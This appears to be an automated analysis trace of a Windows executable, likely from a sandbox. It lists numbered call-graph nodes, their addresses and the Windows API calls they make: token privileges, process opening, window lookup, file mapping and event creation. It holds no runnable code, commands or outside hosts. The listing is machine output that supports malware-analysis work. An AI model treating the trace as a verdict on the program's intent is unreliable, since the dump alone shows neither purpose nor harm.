calls 96366->96380 96374 110ce180 96367->96374 96372 110ce650 264 API calls 2 library calls 96372->96350 96375 110ce18b 96374->96375 96376 110ce1a2 96374->96376 96381 110290f0 261 API calls 2 library calls 96375->96381 96376->96350 96376->96372 96398->96280 96399->96264 96402 110ce31c 96401->96402 96403 110ce309 96401->96403 96402->96297 96402->96298 96403->96402 96404 110ce180 261 API calls 96403->96404 96404->96402 96407 1110c420 std::locale::_Init 261 API calls 96406->96407 96408 110ffe0d 96407->96408 96409 110ffe40 96408->96409 96414 110ffcc0 96408->96414 96409->96160 96411 110ffe2d 96411->96160 96412->96164 96413->96166 96421 1115bd20 96414->96421 96417 110ffd27 std::locale::_Init 96419 110ffd60 GetStockObject RegisterClassA 96417->96419 96418 110ffd91 CreateWindowExA 96418->96411 96419->96418 96420 110ffd8a 96419->96420 96420->96418 96424 1115ab80 GlobalAddAtomA 96421->96424 96425 1115abb5 GetLastError wsprintfA 96424->96425 96426 1115ac07 GlobalAddAtomA GlobalAddAtomA 96424->96426 96433 110290f0 261 API calls 2 library calls 96425->96433 96428 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96426->96428 96430 110ffcf1 GlobalAddAtomA 96428->96430 96430->96417 96430->96418 96435 1109dc40 GetTokenInformation 96434->96435 96440 1109dcd6 96434->96440 96438 1109dc62 __crtGetStringTypeA_stat 96435->96438 96436 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96437 1109dce8 96436->96437 96437->96022 96439 1109dc68 GetTokenInformation 96438->96439 96438->96440 96439->96440 96441 1109dc7a 96439->96441 96440->96436 96442 1109dcaf EqualSid 96441->96442 96443 1109dc83 AllocateAndInitializeSid 96441->96443 96442->96440 96444 1109dcbd 96442->96444 96443->96440 96443->96442 96445 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96444->96445 96446 1109dcd2 96445->96446 96446->96022 96448 1113f69a 96447->96448 96448->96039 96450 1116021d 96449->96450 96451 1116020b 96449->96451 96464 111601ac 75 API calls 2 library calls 
96450->96464 96451->96049 96453 11160227 96453->96049 96455 11080d0d 96454->96455 96456 11080d12 96454->96456 96465 11080a30 IsDBCSLeadByte 96455->96465 96458 11080d1b 96456->96458 96463 11080d33 96456->96463 96466 1115ff54 81 API calls 3 library calls 96458->96466 96460 11080d2c 96460->96038 96461 11080d39 96461->96038 96462 11161f66 81 API calls std::locale::_Init 96462->96463 96463->96461 96463->96462 96464->96453 96465->96456 96466->96460 96467->95891 96468->95885 96469->95897 96470->95901 96471->95901 96473 111610dd 96472->96473 96474 111610f6 96472->96474 96473->96474 96505 1116c9b8 8 API calls 96473->96505 96476 11161d95 96474->96476 96506 1116fe36 LeaveCriticalSection 96476->96506 96478 11161ce2 96479 11161a47 96478->96479 96480 11161a70 96479->96480 96486 11161a8b 96479->96486 96481 11161a7a 96480->96481 96484 1116170d __setlocale_set_cat 97 API calls 96480->96484 96485 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96481->96485 96482 11161bdc 96507 111614ec 96482->96507 96484->96481 96488 11161c61 96485->96488 96486->96482 96489 11161ac0 _strpbrk _strncmp _strcspn _strlen 96486->96489 96490 11161bb5 96486->96490 96488->95922 96488->95926 96489->96481 96489->96490 96494 11161bce 96489->96494 96496 1116170d __setlocale_set_cat 97 API calls 96489->96496 96561 11165309 34 API calls 2 library calls 96489->96561 96490->96481 96562 11161387 38 API calls 4 library calls 96490->96562 96495 1116a682 __invoke_watson 10 API calls 96494->96495 96495->96481 96496->96489 96497->95908 96498->95914 96505->96474 96506->96478 96508 11167f85 __getptd 62 API calls 96507->96508 96509 11161527 96508->96509 96511 1116158d __setlocale_get_all _memmove _strlen 96509->96511 96513 1116866f _strcpy_s 34 API calls 96509->96513 96519 11161594 96509->96519 96511->96519 96513->96511 96561->96489 96562->96481 96635 1113f146 96633->96635 96634 1113f203 96634->95939 96635->96634 96640 11080b10 96635->96640 96637 1113f16b 96638 11080b10 IsDBCSLeadByte 96637->96638 96639 
1113f19b _memmove 96638->96639 96639->95939 96641 11080b1c 96640->96641 96643 11080b21 std::locale::_Init 96640->96643 96644 11080a30 IsDBCSLeadByte 96641->96644 96643->96637 96644->96643 96683 11160c1d 96684 11160c29 ___lock_fhandle 96683->96684 96685 11160c3c 96684->96685 96687 11160c6d 96684->96687 96720 11165abf 23 API calls __getptd_noexit 96685->96720 96690 11167769 __lock_file EnterCriticalSection 96687->96690 96692 11160c4c ___lock_fhandle 96687->96692 96688 11160c41 96721 1116a6d4 11 API calls __write_nolock 96688->96721 96691 11160c7b 96690->96691 96693 11165a57 __fclose_nolock 34 API calls 96691->96693 96696 11160cf1 96691->96696 96698 11160c8c 96693->96698 96694 11160d1e 96724 11160d4d LeaveCriticalSection LeaveCriticalSection __ftelli64 96694->96724 96696->96694 96702 1116e1f5 96696->96702 96698->96696 96722 11165abf 23 API calls __getptd_noexit 96698->96722 96700 11160ce6 96723 1116a6d4 11 API calls __write_nolock 96700->96723 96703 1116e202 96702->96703 96709 1116e217 __getbuf 96702->96709 96755 11165abf 23 API calls __getptd_noexit 96703->96755 96705 1116e212 96705->96696 96706 1116e207 96756 1116a6d4 11 API calls __write_nolock 96706->96756 96708 11165a57 __fclose_nolock 34 API calls 96710 1116e260 96708->96710 96709->96705 96709->96708 96725 11170fc0 96710->96725 96712 1116e267 96712->96705 96713 11165a57 __fclose_nolock 34 API calls 96712->96713 96714 1116e28a 96713->96714 96714->96705 96715 11165a57 __fclose_nolock 34 API calls 96714->96715 96716 1116e296 96715->96716 96716->96705 96717 11165a57 __fclose_nolock 34 API calls 96716->96717 96718 1116e2a3 96717->96718 96719 11165a57 __fclose_nolock 34 API calls 96718->96719 96719->96705 96720->96688 96721->96692 96722->96700 96723->96696 96724->96692 96726 11170fcc ___lock_fhandle 96725->96726 96727 11170fd4 96726->96727 96728 11170fef 96726->96728 96757 11165ad2 23 API calls __getptd_noexit 96727->96757 96729 11170ffb 96728->96729 96734 11171035 96728->96734 96759 11165ad2 23 API calls 
__getptd_noexit 96729->96759 96732 11170fd9 96758 11165abf 23 API calls __getptd_noexit 96732->96758 96733 11171000 96760 11165abf 23 API calls __getptd_noexit 96733->96760 96737 11171057 96734->96737 96738 11171042 96734->96738 96739 111731d2 ___lock_fhandle 3 API calls 96737->96739 96762 11165ad2 23 API calls __getptd_noexit 96738->96762 96743 1117105d 96739->96743 96740 11171008 96761 1116a6d4 11 API calls __write_nolock 96740->96761 96742 11171047 96763 11165abf 23 API calls __getptd_noexit 96742->96763 96746 1117107f 96743->96746 96747 1117106b 96743->96747 96745 11170fe1 ___lock_fhandle 96745->96712 96764 11165abf 23 API calls __getptd_noexit 96746->96764 96749 11170a09 __read_nolock 44 API calls 96747->96749 96751 11171077 96749->96751 96766 111710ae LeaveCriticalSection __unlock_fhandle 96751->96766 96752 11171084 96765 11165ad2 23 API calls __getptd_noexit 96752->96765 96755->96706 96756->96705 96757->96732 96758->96745 96759->96733 96760->96740 96761->96745 96762->96742 96763->96740 96764->96752 96765->96751 96766->96745 96767 11112b00 96785 11141990 96767->96785 96770 11112b45 96771 11112b54 CoInitialize CoCreateInstance 96770->96771 96772 11112b28 96770->96772 96775 11112b84 LoadLibraryA 96771->96775 96784 11112b79 96771->96784 96773 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96772->96773 96776 11112b36 96773->96776 96774 11141710 std::locale::_Init 86 API calls 96774->96770 96777 11112ba0 GetProcAddress 96775->96777 96775->96784 96780 11112bb0 SHGetSettings 96777->96780 96781 11112bc4 FreeLibrary 96777->96781 96778 11112c61 CoUninitialize 96779 11112c67 96778->96779 96782 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96779->96782 96780->96781 96781->96784 96783 11112c76 96782->96783 96784->96778 96784->96779 96786 11141710 std::locale::_Init 86 API calls 96785->96786 96787 11112b1e 96786->96787 96787->96770 96787->96772 96787->96774 96788 11017610 GetTickCount 96795 11017520 96788->96795 96793 11142a60 
std::locale::_Init 21 API calls 96794 11017657 96793->96794 96796 11017540 96795->96796 96803 110175f6 96795->96803 96797 11017562 CoInitialize 96796->96797 96799 11017559 WaitForSingleObject 96796->96799 96823 111585e0 96797->96823 96798 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96801 11017605 96798->96801 96799->96797 96809 11017440 96801->96809 96802 110175f0 CoUninitialize 96802->96803 96803->96798 96804 110175e2 96804->96802 96804->96803 96805 110175dc 96835 11160007 35 API calls __fassign 96805->96835 96807 111601fd std::locale::_Init 75 API calls 96808 11017591 96807->96808 96808->96804 96808->96805 96808->96807 96810 11017460 96809->96810 96818 11017506 96809->96818 96812 11017478 CoInitialize 96810->96812 96813 1101746f WaitForSingleObject 96810->96813 96811 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96815 11017515 SetEvent GetTickCount 96811->96815 96814 111585e0 271 API calls 96812->96814 96813->96812 96820 110174a7 96814->96820 96815->96793 96816 110174f2 96817 11017500 CoUninitialize 96816->96817 96816->96818 96817->96818 96818->96811 96819 110174ec 96869 11160007 35 API calls __fassign 96819->96869 96820->96816 96820->96819 96822 111601fd std::locale::_Init 75 API calls 96820->96822 96822->96820 96824 111585f4 96823->96824 96825 111585ec 96823->96825 96836 1115f97b 96824->96836 96825->96808 96828 11158614 96828->96808 96829 11158740 96831 1115f3b5 _free 23 API calls 96829->96831 96832 11158768 96831->96832 96832->96808 96833 11158631 96833->96829 96834 11158724 SetLastError 96833->96834 96834->96833 96835->96804 96837 1116c936 __calloc_crt 23 API calls 96836->96837 96838 1115f995 96837->96838 96839 11158608 96838->96839 96860 11165abf 23 API calls __getptd_noexit 96838->96860 96839->96828 96839->96829 96843 11158220 CoInitializeSecurity CoCreateInstance 96839->96843 96841 1115f9a8 96841->96839 96861 11165abf 23 API calls __getptd_noexit 96841->96861 96844 11158295 wsprintfW SysAllocString 96843->96844 96845 
11158414 96843->96845 96849 111582db 96844->96849 96846 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96845->96846 96848 11158440 96846->96848 96847 11158401 SysFreeString 96847->96845 96848->96833 96849->96847 96849->96849 96850 1115836c 96849->96850 96851 1115835a wsprintfW 96849->96851 96859 111583e9 96849->96859 96862 110967f0 96850->96862 96851->96850 96853 1115837e 96854 110967f0 262 API calls 96853->96854 96855 11158393 96854->96855 96867 110968b0 InterlockedDecrement SysFreeString std::ios_base::_Tidy 96855->96867 96857 111583d7 96868 110968b0 InterlockedDecrement SysFreeString std::ios_base::_Tidy 96857->96868 96859->96847 96860->96841 96861->96839 96863 1110c420 std::locale::_Init 261 API calls 96862->96863 96864 11096823 96863->96864 96865 11096836 SysAllocString 96864->96865 96866 11096854 96864->96866 96865->96866 96866->96853 96867->96857 96868->96859 96869->96816 96870 11025850 96871 1102585a 96870->96871 96873 11025860 96870->96873 96872 11160535 std::locale::_Init 98 API calls 96871->96872 96872->96873 96874 11132080 96875 11132089 96874->96875 96881 111320b8 96874->96881 96876 11141990 std::locale::_Init 86 API calls 96875->96876 96877 1113208e 96876->96877 96877->96881 96882 1112fc80 96877->96882 96879 11132097 96879->96881 96910 1105d340 96879->96910 96883 1112fca1 std::locale::_Init 96882->96883 96884 1112fdc1 96882->96884 96887 1112fcb6 96883->96887 96888 1112fccd 96883->96888 96885 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96884->96885 96886 1112fdd5 96885->96886 96886->96879 96890 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96887->96890 96889 11141240 std::locale::_Init 261 API calls 96888->96889 96892 1112fcda wsprintfA 96889->96892 96891 1112fcc9 96890->96891 96891->96879 96920 1113f8a0 96892->96920 96894 1112fd00 96895 1112fd07 96894->96895 96896 1112fd78 96894->96896 96931 110b6bd0 96895->96931 96897 11141240 std::locale::_Init 261 API calls 96896->96897 96899 1112fd84 wsprintfA 
96897->96899 96901 1113f8a0 std::locale::_Init 8 API calls 96899->96901 96900 1112fd12 96902 1112fda4 96900->96902 96903 1112fd1a GetTickCount SHGetFolderPathA GetTickCount 96900->96903 96901->96902 96904 11142a60 std::locale::_Init 21 API calls 96902->96904 96905 1112fd45 96903->96905 96907 1112fd50 96903->96907 96904->96884 96906 11142a60 std::locale::_Init 21 API calls 96905->96906 96906->96907 96907->96902 96946 110eb6b0 9 API calls 96907->96946 96909 1112fd73 96909->96902 96911 1105d36f 96910->96911 96912 1105d395 96911->96912 96913 1105d375 96911->96913 96915 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96912->96915 96914 1115fe1b __wcstoi64 75 API calls 96913->96914 96917 1105d382 96914->96917 96916 1105d3a2 96915->96916 96916->96881 96918 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96917->96918 96919 1105d38f 96918->96919 96919->96881 96921 1113f8c1 CreateFileA 96920->96921 96923 1113f95e CloseHandle 96921->96923 96924 1113f93e 96921->96924 96927 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96923->96927 96925 1113f942 CreateFileA 96924->96925 96926 1113f97b 96924->96926 96925->96923 96925->96926 96929 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96926->96929 96928 1113f977 96927->96928 96928->96894 96930 1113f98a 96929->96930 96930->96894 96932 110b6be3 GetModuleHandleA GetProcAddress 96931->96932 96933 110b6ca4 96931->96933 96934 110b6c2a GetCurrentProcessId OpenProcess 96932->96934 96935 110b6c0f GetCurrentProcessId 96932->96935 96933->96900 96936 110b6c47 OpenProcessToken 96934->96936 96941 110b6c77 96934->96941 96937 110b6c18 96935->96937 96938 110b6c58 96936->96938 96936->96941 96937->96934 96939 110b6c1c 96937->96939 96940 110b6c5f GetTokenInformation 96938->96940 96938->96941 96939->96900 96940->96941 96942 110b6c93 CloseHandle 96941->96942 96943 110b6c96 96941->96943 96942->96943 96944 110b6c9a CloseHandle 96943->96944 96945 110b6c9d 96943->96945 96944->96945 96945->96933 
96946->96909 96947 11030b10 96948 11030b1e 96947->96948 96952 11142490 96948->96952 96951 11030b3f std::locale::_Init std::ios_base::_Tidy 96955 11141680 96952->96955 96956 11141690 96955->96956 96956->96956 96957 1110c4a0 std::locale::_Init 261 API calls 96956->96957 96958 111416a2 96957->96958 96961 111415b0 96958->96961 96960 11030b2f SetUnhandledExceptionFilter 96960->96951 96962 11141602 __crtGetStringTypeA_stat 96961->96962 96963 111415c7 _strncpy 96961->96963 96972 1113ed90 MultiByteToWideChar 96962->96972 96965 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96963->96965 96967 111415fe 96965->96967 96966 11141634 96973 1113edd0 WideCharToMultiByte GetLastError 96966->96973 96967->96960 96969 11141646 96970 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96969->96970 96971 11141659 96970->96971 96971->96960 96972->96966 96973->96969 96974 11137300 96975 1113730c 96974->96975 96976 111373c8 96975->96976 96979 11137368 96975->96979 96981 111373da 96975->96981 96977 11136060 374 API calls 96976->96977 96976->96981 96977->96981 96978 111373a0 96984 11136060 96978->96984 96979->96978 96979->96981 96982 1105d340 75 API calls 96979->96982 96982->96978 96983 111373b1 96985 1113649f 96984->96985 96988 1113607d 96984->96988 96986 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96985->96986 96987 111364ae 96986->96987 96987->96983 96988->96985 96989 11141710 std::locale::_Init 86 API calls 96988->96989 96990 111360bc 96989->96990 96990->96985 96991 1105d340 75 API calls 96990->96991 96992 111360eb 96991->96992 97064 111299f0 96992->97064 96994 11136230 PostMessageA 96996 11136245 96994->96996 96995 1105d340 75 API calls 96997 1113622c 96995->96997 96998 11136255 96996->96998 97078 1110c270 InterlockedDecrement 96996->97078 96997->96994 96997->96996 97000 1113625b 96998->97000 97001 1113627d 96998->97001 97004 111362b3 std::ios_base::_Tidy 97000->97004 97005 111362ce 97000->97005 97079 1112d530 297 API calls 
std::locale::_Init 97001->97079 97003 11136285 97080 111434d0 263 API calls 97003->97080 97013 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 97004->97013 97082 1113f4f0 97005->97082 97009 111362d3 97087 111434f0 97009->97087 97010 1113628f 97081 11129bf0 SetDlgItemTextA 97010->97081 97016 111362ca 97013->97016 97015 111362a0 std::ios_base::_Tidy 97015->97000 97016->96983 97017 111362f6 97090 11132620 295 API calls 5 library calls 97017->97090 97020 111361db 97020->96994 97020->96995 97021 11136354 97022 11136368 97021->97022 97023 1113642c 97021->97023 97028 1113638c 97022->97028 97093 11132620 295 API calls 5 library calls 97022->97093 97026 1113644d 97023->97026 97031 1113643b 97023->97031 97032 11136434 97023->97032 97024 11136327 97024->97021 97027 1113633c 97024->97027 97025 111362fd std::ios_base::_Tidy 97025->97021 97025->97024 97091 11132620 295 API calls 5 library calls 97025->97091 97092 1112e330 143 API calls 97027->97092 97065 11129a0c 97064->97065 97066 11129a47 97065->97066 97068 11129a34 97065->97068 97101 1106ae60 294 API calls 97066->97101 97069 111434f0 265 API calls 97068->97069 97070 11129a3f 97069->97070 97071 11129a93 97070->97071 97072 1113e8f0 std::locale::_Init 261 API calls 97070->97072 97071->97020 97073 11142150 97071->97073 97072->97071 97074 1110c650 4 API calls 97073->97074 97075 1114215f 97074->97075 97102 11141100 97075->97102 97078->96998 97079->97003 97080->97010 97081->97015 97083 1113f4f9 97082->97083 97084 1113f4ff 97082->97084 97083->97009 97085 1102a250 std::locale::_Init 141 API calls 97084->97085 97086 1113f516 97085->97086 97086->97009 97117 111433b0 97087->97117 97090->97025 97091->97024 97101->97070 97113 110952d0 97102->97113 97105 11141124 wsprintfA 97106 11141137 97105->97106 97107 11141152 97106->97107 97108 1114113b 97106->97108 97112 11141163 97107->97112 97116 11140d70 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 97107->97116 97115 110290f0 261 API calls 2 library calls 97108->97115 
97112->97020 97114 110952d9 LoadStringA 97113->97114 97114->97105 97114->97106 97116->97112 97118 110952d0 97117->97118 97119 111433de LoadStringA 97118->97119 97120 11143402 97119->97120 97121 111433f0 97119->97121 97122 1114341e 97120->97122 97123 11143409 wsprintfA 97120->97123 97146 11140d70 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 97121->97146 97125 1114343a 97122->97125 97126 11143426 97122->97126 97123->97125 97132 11143250 97125->97132 97147 110290f0 261 API calls 2 library calls 97126->97147 97130 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 97131 111362da SetWindowTextA 97130->97131 97131->97017 97131->97025 97133 11080b10 IsDBCSLeadByte 97132->97133 97134 111432a0 97133->97134 97135 111432e3 wvsprintfA 97134->97135 97136 111601fd std::locale::_Init 75 API calls 97134->97136 97138 111432f8 97135->97138 97139 111432b3 97136->97139 97137 11143314 97141 1113e8f0 std::locale::_Init 261 API calls 97137->97141 97138->97137 97140 11142a60 std::locale::_Init 21 API calls 97138->97140 97139->97135 97142 111432c0 FormatMessageA 97139->97142 97140->97137 97143 11143324 97141->97143 97142->97138 97144 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 97143->97144 97145 111433a6 97144->97145 97145->97130 97146->97120 97148 11088b50 97149 1110c650 4 API calls 97148->97149 97150 11088b63 97149->97150 97151 11088b6d 97150->97151 97160 11088290 264 API calls std::locale::_Init 97150->97160 97154 11088b94 97151->97154 97161 11088290 264 API calls std::locale::_Init 97151->97161 97156 11088ba3 97154->97156 97157 11088b20 97154->97157 97162 110887b0 97157->97162 97160->97151 97161->97154 97203 11087ab0 6 API calls 97162->97203 97164 110887e9 GetParent 97165 110887fc 97164->97165 97166 1108880d 97164->97166 97167 11088800 GetParent 97165->97167 97168 11141430 263 API calls 97166->97168 97167->97166 97167->97167 97169 11088819 97168->97169 97170 1116076b std::locale::_Init 139 API calls 97169->97170 97171 11088826 
std::ios_base::_Tidy 97170->97171 97172 11141430 263 API calls 97171->97172 97173 1108883f 97172->97173 97204 110139e0 22 API calls 2 library calls 97173->97204 97175 1108885a 97176 1113f8a0 std::locale::_Init 8 API calls 97175->97176 97179 1108889a std::ios_base::_Tidy 97176->97179 97177 110888b5 97178 11160535 std::locale::_Init 98 API calls 97177->97178 97181 110888d3 std::locale::_Init 97177->97181 97178->97181 97179->97177 97180 1113e8f0 std::locale::_Init 261 API calls 97179->97180 97180->97177 97183 1102a250 std::locale::_Init 141 API calls 97181->97183 97194 11088984 std::ios_base::_Tidy 97181->97194 97182 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 97184 11088a72 97182->97184 97185 11088923 97183->97185 97184->97156 97186 1113e8f0 std::locale::_Init 261 API calls 97185->97186 97187 1108892b 97186->97187 97188 11080be0 std::locale::_Init IsDBCSLeadByte 97187->97188 97189 11088942 97188->97189 97189->97194 97205 11080c50 97189->97205 97191 1108895a 97192 1108899e 97191->97192 97193 11088961 97191->97193 97196 11080c50 82 API calls 97192->97196 97215 110b6880 97193->97215 97194->97182 97198 110889a9 97196->97198 97198->97194 97200 110b6880 36 API calls 97198->97200 97199 110b6880 36 API calls 97199->97194 97201 110889b6 97200->97201 97201->97194 97202 110b6880 36 API calls 97201->97202 97202->97194 97203->97164 97204->97175 97206 11080c5d 97205->97206 97207 11080c62 97205->97207 97218 11080a30 IsDBCSLeadByte 97206->97218 97209 11080c6b 97207->97209 97210 11080c7f 97207->97210 97219 11160e4e 81 API calls 3 library calls 97209->97219 97212 11080ce3 97210->97212 97214 11161f66 81 API calls std::locale::_Init 97210->97214 97212->97191 97213 11080c78 97213->97191 97214->97210 97220 110b6860 97215->97220 97218->97207 97219->97213 97223 11163ab3 97220->97223 97226 11163a34 97223->97226 97227 11163a41 97226->97227 97228 11163a5b 97226->97228 97244 11165ad2 23 API calls __getptd_noexit 97227->97244 97228->97227 97229 11163a64 GetFileAttributesA 
97228->97229 97231 11163a72 GetLastError 97229->97231 97238 11163a88 97229->97238 97247 11165ae5 23 API calls 3 library calls 97231->97247 97232 11163a46 97245 11165abf 23 API calls __getptd_noexit 97232->97245 97234 11088967 97234->97194 97234->97199 97236 11163a4d 97246 1116a6d4 11 API calls __write_nolock 97236->97246 97238->97234 97249 11165ad2 23 API calls __getptd_noexit 97238->97249 97241 11163a9b 97250 11165abf 23 API calls __getptd_noexit 97241->97250 97243 11163a7e 97248 11165abf 23 API calls __getptd_noexit 97243->97248 97244->97232 97245->97236 97246->97234 97247->97243 97248->97234 97249->97241 97250->97243 97251 1102e15e 97252 11080c50 82 API calls 97251->97252 97253 1102e171 97252->97253 97254 1113f220 82 API calls 97253->97254 97255 1102e19a 97254->97255 97256 1115f5b7 std::locale::_Init 75 API calls 97255->97256 97261 1102e1a7 97255->97261 97256->97261 97257 1102e1d6 97258 1102e248 97257->97258 97259 1102e22f GetSystemMetrics 97257->97259 97263 1102e262 CreateEventA 97258->97263 97259->97258 97260 1102e23e 97259->97260 97262 11142a60 std::locale::_Init 21 API calls 97260->97262 97261->97257 97264 11141710 std::locale::_Init 86 API calls 97261->97264 97262->97258 97265 1102e275 97263->97265 97266 1102e289 97263->97266 97264->97257 98162 110290f0 261 API calls 2 library calls 97265->98162 97268 1110c420 std::locale::_Init 261 API calls 97266->97268 97269 1102e290 97268->97269 97270 1110d060 422 API calls 97269->97270 97271 1102e2b0 97270->97271 97272 1110c420 std::locale::_Init 261 API calls 97271->97272 97273 1102e2c4 97272->97273 97274 1110d060 422 API calls 97273->97274 97275 1102e2e4 97274->97275 97276 1110c420 std::locale::_Init 261 API calls 97275->97276 97277 1102e363 97276->97277 97278 11060520 261 API calls 97277->97278 97279 1102e393 97278->97279 97280 1110c420 std::locale::_Init 261 API calls 97279->97280 97281 1102e3ad 97280->97281 97282 1102e3d6 FindWindowA 97281->97282 97283 1102e527 97282->97283 97284 1102e40b 97282->97284 97614 
11060970 97283->97614 97284->97283 97288 1102e423 GetWindowThreadProcessId 97284->97288 97287 11060970 264 API calls 97289 1102e545 97287->97289 97290 11142a60 std::locale::_Init 21 API calls 97288->97290 97291 11060970 264 API calls 97289->97291 97292 1102e449 OpenProcess 97290->97292 97293 1102e551 97291->97293 97292->97283 97294 1102e469 97292->97294 97295 1102e568 97293->97295 97296 1102e55f 97293->97296 97298 11142a60 std::locale::_Init 21 API calls 97294->97298 97621 11141f80 97295->97621 98163 110279d0 115 API calls 2 library calls 97296->98163 97301 1102e49c 97298->97301 97299 1102e564 97299->97295 97303 1102e4db CloseHandle FindWindowA 97301->97303 97304 11142a60 std::locale::_Init 21 API calls 97301->97304 97302 1102e577 97307 11141430 263 API calls 97302->97307 97305 1102e503 GetWindowThreadProcessId 97303->97305 97306 1102e517 97303->97306 97308 1102e4ae SendMessageA WaitForSingleObject 97304->97308 97305->97306 97309 11142a60 std::locale::_Init 21 API calls 97306->97309 97308->97303 97312 1102e4ce 97308->97312 97313 1102e524 97309->97313 97314 11142a60 std::locale::_Init 21 API calls 97312->97314 97313->97283 97315 1102e4d8 97314->97315 97315->97303 97615 110609e6 97614->97615 97616 11060997 97614->97616 97617 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 97615->97617 97616->97615 97618 11080c50 82 API calls 97616->97618 98185 11060890 264 API calls 4 library calls 97616->98185 97620 1102e539 97617->97620 97618->97616 97620->97287 97622 11141240 std::locale::_Init 261 API calls 97621->97622 97623 11141f9b wsprintfA 97622->97623 97624 11141240 std::locale::_Init 261 API calls 97623->97624 97625 11141fb7 wsprintfA 97624->97625 97626 1113f8a0 std::locale::_Init 8 API calls 97625->97626 97628 11141fd4 97626->97628 97627 11142000 97630 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 97627->97630 97628->97627 97629 1113f8a0 std::locale::_Init 8 API calls 97628->97629 97632 11141fe9 97629->97632 97631 1114200c 97630->97631 

Control-flow Graph

APIs
  • Part of subcall function 1109C750: GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,24DE4E77,00080000,00000000,00000000), ref: 1109C77D
  • Part of subcall function 1109C750: OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
  • Part of subcall function 1109C750: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
  • Part of subcall function 1109C750: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9
• LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,24DE4E77,00080000,00000000,00000000), ref: 1109D535
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109D54E
• SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109D559
• GetVersionExA.KERNEL32(?), ref: 1109D570
• GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D5DE
• SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109D5F3
• FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D604
• CreateFileMappingA.KERNEL32(000000FF,1102FAC3,00000004,00000000,?,?), ref: 1109D640
• GetLastError.KERNEL32 ref: 1109D64D
• LocalFree.KERNEL32(?), ref: 1109D676
• LocalFree.KERNEL32(?), ref: 1109D683
• GetLastError.KERNEL32 ref: 1109D6A0
• MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109D6BE
• LocalFree.KERNEL32(?), ref: 1109D6E9
• LocalFree.KERNEL32(?), ref: 1109D6F6
  • Part of subcall function 1109C6C0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109D58E), ref: 1109C6C8
  • Part of subcall function 1109C700: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109C714
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D722
• LocalFree.KERNEL32(?), ref: 1109D7EB
• LocalFree.KERNEL32(?), ref: 1109D7F8
• _memset.LIBCMT ref: 1109D810
• GetTickCount.KERNEL32 ref: 1109D818
• GetCurrentProcessId.KERNEL32 ref: 1109D8C4
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D8DF
• CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109D92B
• GetLastError.KERNEL32 ref: 1109D934
• GetLastError.KERNEL32(00000000), ref: 1109D93B
• CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D970
• GetLastError.KERNEL32 ref: 1109D979
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109D980
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109D9B6
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109D9BF
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109D9C6
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D9FB
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109DA0A
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109DA0D
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109DA35
